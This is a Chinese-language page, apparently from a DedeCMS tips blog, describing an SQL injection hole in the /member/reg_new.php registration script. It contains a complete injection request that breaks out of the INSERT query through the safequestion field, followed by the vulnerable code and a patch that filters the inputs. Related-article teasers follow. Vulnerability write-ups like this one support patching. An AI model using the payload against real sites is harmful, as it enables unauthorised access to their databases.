dedecms织梦 /member/reg_new.php SQL注入漏洞

2018-05-28dedecms安装使用

888

1. 漏洞描述

Dedecms会员中心注入漏洞

2. 漏洞触发条件

/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=
//把vdcode=slum改成当前的验证码

3. 漏洞影响范围

4. 漏洞代码分析

/member/reg_new.php

..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd); 

$spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);

//未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询
$inQuery = "INSERT INTO `wmd_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; 

if($dsql->ExecuteNoneQuery($inQuery))
..

5. 防御方法

/member/reg_new.php

..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd);
/* 对$mtype、$safeanswer、$safequestion进行有效过滤 */
    $mtype = HtmlReplace($mtype,1);
    $safeanswer = HtmlReplace($safeanswer);
    $safequestion = HtmlReplace($safequestion);
/* */

$spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);

$inQuery = "INSERT INTO `wmd_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
if($dsql->ExecuteNoneQuery($inQuery))
{
..

The End

织梦dedecms生成报错Fatal error: Allowed memory size of in /include

织梦生成静态html页面时报错：Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 71 bytes) in /wwwroot/include/helpers/string.helper.php on line 121 字面意思理解是内存不足,很多朋友可能认为是内存不足问题,实际上不...

2023-10-13 dedecms安装使用

329

织梦Dedecms限制栏目列表生成的页数

有时候我们的文档特别的多，另外也是为防止网站被采集，全站文章被索引，所以要控制下织梦dedecms列表页面数量。这样的话我们要具体怎么操作呢？ 1、首先建立一个全局变量：在系统-站点设置中添加一个新的变量，变量名称：cfg_listmaxpage，变量说明：栏目...

2023-05-24 dedecms安装使用

126

dedecms织梦全局变量调用方法总结

dedecms织梦的全局变量可以在/include/common.inc.php文件中看到，此文件内定义了大量的全局变量，详细自己去看看。如果我们要实用dedeCMS织梦全局变量该如何调用：第一种单独调用： {wmd:global.变量名 /}，注意闭合，否则会以文本形式输出。这种一般适用...

2023-03-01 dedecms安装使用

238

织梦DEDECMS 栏目文章文章命名规则修改

织梦DEDECMS 栏目文章文章命名规则修改，每次添加栏目的时候都要改文章命名规则，十分麻烦，修改下面这个地方就可以一改永亦，织梦模板网为您解答找到\include\common.inc.php 搜索 $cfg_df_namerule 把： $cfg_df_namerule = {typedir}/{Y}/{M}{D}/{aid...

2021-09-24 dedecms安装使用

165

解决dedecms织梦系统{wmd:arclist keyword='动态获取关键词'}只生效一次

当我们通过{wmd:arclist keyword=关键词}来调用文章列表时，你会发现只在其中一个栏目里生效，在其他栏目，仍然显示上一次的关键词。原因是由于arclist的缓存导致的。只需修改/include/taglib/arclist.lib.php文件，大概在384行： $taghash = md5(seriali...

2021-09-24 dedecms安装使用

212

织梦dedecms数据库内容替换安全确认码怎么去掉

我们在使用织梦dedecms数据库内容替换时候，经常遇到安全码显示的无法识别或者不清晰，这个安全码的位置是在核心 - 批量维护 - 数据库内容替换，如果识别不了，这个页面还没有改变验证码的地方，只能重新刷新页面，如果我们不想要这个安全码的话，要怎么操...

2021-09-24 dedecms安装使用

109

相关推荐

织梦dedecms生成报错Fatal error: Allowed memory size of in /include

织梦Dedecms限制栏目列表生成的页数

dedecms织梦全局变量调用方法总结

织梦DEDECMS 栏目文章文章命名规则修改

解决dedecms织梦系统{wmd:arclist keyword='动态获取关键词'}只生效一次

织梦dedecms数据库内容替换安全确认码怎么去掉

热门文章

热门精品源码

最新VIP资源